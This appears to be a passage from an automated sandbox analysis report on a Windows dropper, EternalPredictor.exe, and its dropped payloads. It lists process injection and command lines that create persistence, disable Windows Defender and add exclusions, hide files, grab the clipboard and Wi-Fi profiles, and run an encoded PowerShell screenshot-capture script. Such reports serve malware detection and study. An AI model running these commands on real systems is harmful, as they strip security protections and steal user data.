Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 396 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\eternal.exe
PID 396 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\eternal.exe
PID 396 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\skuld.exe
PID 396 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\skuld.exe
PID 4708 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Roaming\skuld.exe C:\Windows\system32\attrib.exe
PID 4708 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Roaming\skuld.exe C:\Windows\system32\attrib.exe
PID 396 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 396 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 3824 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 3824 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 1432 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Roaming\eternal.exe C:\Windows\System32\schtasks.exe
PID 1432 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Roaming\eternal.exe C:\Windows\System32\schtasks.exe
PID 3404 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 996 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 996 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\System32\Conhost.exe
PID 3404 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\System32\Conhost.exe
PID 996 wrote to memory of 3304 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 996 wrote to memory of 3304 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3928 wrote to memory of 4700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3928 wrote to memory of 4700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3608 wrote to memory of 3488 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3608 wrote to memory of 3488 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3404 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 2396 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2396 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1816 wrote to memory of 3172 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1816 wrote to memory of 3172 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4844 wrote to memory of 876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4844 wrote to memory of 876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4500 wrote to memory of 3816 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4500 wrote to memory of 3816 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3404 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3600 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3600 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3404 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 984 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 984 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 2828 wrote to memory of 1052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2828 wrote to memory of 1052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4988 wrote to memory of 2800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4988 wrote to memory of 2800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3404 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 1756 wrote to memory of 3876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 1756 wrote to memory of 3876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 984 wrote to memory of 424 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 984 wrote to memory of 424 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe

"C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe"

C:\Users\Admin\AppData\Roaming\eternal.exe

"C:\Users\Admin\AppData\Roaming\eternal.exe"

C:\Users\Admin\AppData\Roaming\skuld.exe

"C:\Users\Admin\AppData\Roaming\skuld.exe"

C:\Windows\system32\attrib.exe

attrib +h +s C:\Users\Admin\AppData\Roaming\skuld.exe

C:\Users\Admin\AppData\Roaming\program.exe

"C:\Users\Admin\AppData\Roaming\program.exe"

C:\Users\Admin\AppData\Roaming\program.exe

"C:\Users\Admin\AppData\Roaming\program.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\program.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌ ​  .scr'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\program.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌ ​  .scr'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

